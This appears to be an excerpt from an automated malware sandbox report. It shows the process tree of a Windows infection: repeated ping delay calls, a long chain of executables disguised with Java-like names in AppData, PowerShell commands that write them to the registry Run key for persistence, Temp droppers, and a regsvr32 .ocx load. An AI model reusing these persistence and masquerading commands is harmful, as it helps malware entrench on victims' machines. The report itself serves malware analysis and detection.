- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8092
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8152
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7968
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7784
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7844
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7808
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8288
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8300
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10172
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9048
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9440
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10576
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11452
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11724
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11884
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6696
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6528
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12880
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9052
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5732
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:12836
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe"1⤵PID:1996
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe2⤵PID:4864
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe3⤵PID:5816
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe4⤵PID:5056
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe5⤵PID:6924
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe6⤵PID:12952
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe7⤵PID:12984
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe8⤵PID:2288
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe9⤵PID:11568
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe10⤵PID:4236
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe11⤵PID:12376
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe12⤵PID:12892
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe13⤵PID:7864
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe14⤵PID:13120
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe15⤵PID:4240
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe16⤵PID:10076
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe17⤵PID:10384
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe18⤵PID:11180
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe19⤵PID:11620
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe20⤵PID:11852
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe21⤵PID:12540
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe22⤵PID:12516
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe23⤵PID:12816
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe24⤵PID:12676
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe25⤵PID:2720
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe26⤵PID:5568
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe27⤵PID:12260
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe28⤵PID:8004
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe29⤵PID:8572
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe30⤵PID:1868
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe31⤵PID:5140
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe32⤵PID:3852
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe33⤵PID:2420
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe34⤵PID:4068
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe35⤵PID:8792
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe36⤵PID:8908
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe37⤵PID:8900
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe38⤵PID:8972
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe39⤵PID:2160
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe40⤵PID:9248
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe41⤵PID:4284
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe42⤵PID:6336
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe43⤵PID:388
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe44⤵PID:12660
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe45⤵PID:9456
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_update.exe"46⤵
- Modifies registry key
PID:9980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe\"'"46⤵
- Command and Scripting Interpreter: PowerShell
PID:12404
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe"1⤵PID:12132
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:12072
-
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe2⤵PID:4868
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe3⤵PID:10800
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe4⤵PID:10772
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe5⤵PID:10616
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe6⤵PID:10304
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe7⤵PID:9676
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe8⤵PID:10272
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe9⤵PID:3628
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe10⤵PID:1268
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe11⤵PID:13308
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservicew.exe"12⤵
- Modifies registry key
PID:6312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservicew.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe\"'"12⤵
- Command and Scripting Interpreter: PowerShell
PID:6324
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe"1⤵PID:10796
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe2⤵PID:6864
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe3⤵PID:5400
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe4⤵PID:228
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe5⤵PID:10824
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe6⤵PID:11188
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport.exe"7⤵
- Modifies registry key
PID:11420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe\"'"7⤵
- Command and Scripting Interpreter: PowerShell
PID:5608
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe"1⤵PID:2080
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe2⤵PID:8648
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe3⤵PID:8888
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe4⤵PID:9128
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe5⤵PID:9112
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe6⤵PID:9428
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe7⤵PID:6064
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe8⤵PID:9568
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe9⤵PID:9752
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe10⤵PID:10044
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe11⤵PID:9652
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe12⤵PID:10404
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe13⤵PID:9880
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe14⤵PID:10136
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe15⤵PID:10336
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe16⤵PID:9008
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe17⤵PID:10544
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe18⤵PID:10696
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe19⤵PID:10804
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe20⤵PID:7764
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe21⤵PID:8660
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe22⤵PID:8684
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe23⤵PID:8376
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe24⤵PID:10984
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe25⤵PID:11244
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe26⤵PID:11360
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe27⤵PID:5928
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe28⤵PID:240
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe29⤵PID:4100
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe30⤵PID:4084
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe31⤵PID:11740
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe32⤵PID:11788
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe33⤵PID:11832
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe34⤵PID:8320
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe35⤵PID:11920
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe36⤵PID:6388
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe37⤵PID:6920
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe38⤵PID:7044
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe39⤵PID:6348
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe40⤵PID:7884
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe41⤵PID:12320
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe42⤵PID:1076
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe43⤵PID:4776
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe44⤵PID:3236
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe45⤵PID:1876
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe46⤵PID:12480
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe47⤵PID:7644
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe48⤵PID:7716
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe49⤵PID:4520
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe50⤵PID:5416
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe51⤵PID:2016
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe52⤵PID:7776
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe53⤵PID:7652
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe54⤵PID:7456
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe55⤵PID:11664
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe56⤵PID:6488
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe57⤵PID:13212
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe58⤵PID:6960
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe59⤵PID:420
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe60⤵PID:5092
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe61⤵PID:7212
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe62⤵PID:7436
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe63⤵PID:6632
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe64⤵PID:7888
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe65⤵PID:2912
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe66⤵PID:13272
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe67⤵PID:4644
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe68⤵PID:1364
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe69⤵PID:12272
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe70⤵PID:13268
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe71⤵PID:8516
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe72⤵PID:9116
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe73⤵PID:10104
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservicew.exe"74⤵
- Modifies registry key
PID:10036
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:12704
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\kpF79yep\vatWkPiUMiZpbnWV.exe1⤵PID:10956
-
C:\Users\Admin\AppData\Local\Temp\kpF79yep\vatWkPiUMiZpbnWV.exeC:\Users\Admin\AppData\Local\Temp\kpF79yep\vatWkPiUMiZpbnWV.exe2⤵PID:18748
-
C:\Users\Admin\AppData\Local\Temp\KEWsoNgw\AldOYDXLAPCbJyaV.exeC:\Users\Admin\AppData\Local\Temp\KEWsoNgw\AldOYDXLAPCbJyaV.exe 187483⤵PID:18764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18764 -s 5484⤵
- Program crash
PID:25104
-
-
-
C:\Users\Admin\AppData\Local\Temp\kpF79yep\ZgJenFQlsNDUANTL.exeC:\Users\Admin\AppData\Local\Temp\kpF79yep\ZgJenFQlsNDUANTL.exe 187483⤵PID:26988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 26988 -s 8924⤵
- Program crash
PID:11000
-
-
-
C:\Users\Admin\AppData\Local\Temp\kpF79yep\BHmMf700dtOgbAPj.exeC:\Users\Admin\AppData\Local\Temp\kpF79yep\BHmMf700dtOgbAPj.exe 187483⤵PID:6188
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 12076 -ip 120761⤵PID:8532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6976 -ip 69761⤵PID:18668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 18764 -ip 187641⤵PID:24892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 25468 -ip 254681⤵PID:22060
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"1⤵PID:6924
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"1⤵PID:7788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 11572 -ip 115721⤵PID:25400
-
C:\Windows\system32\regsvr32.EXE"C:\Windows\system32\regsvr32.EXE" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"1⤵PID:25716
-
C:\Windows\SysWOW64\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"2⤵PID:10016
-
-
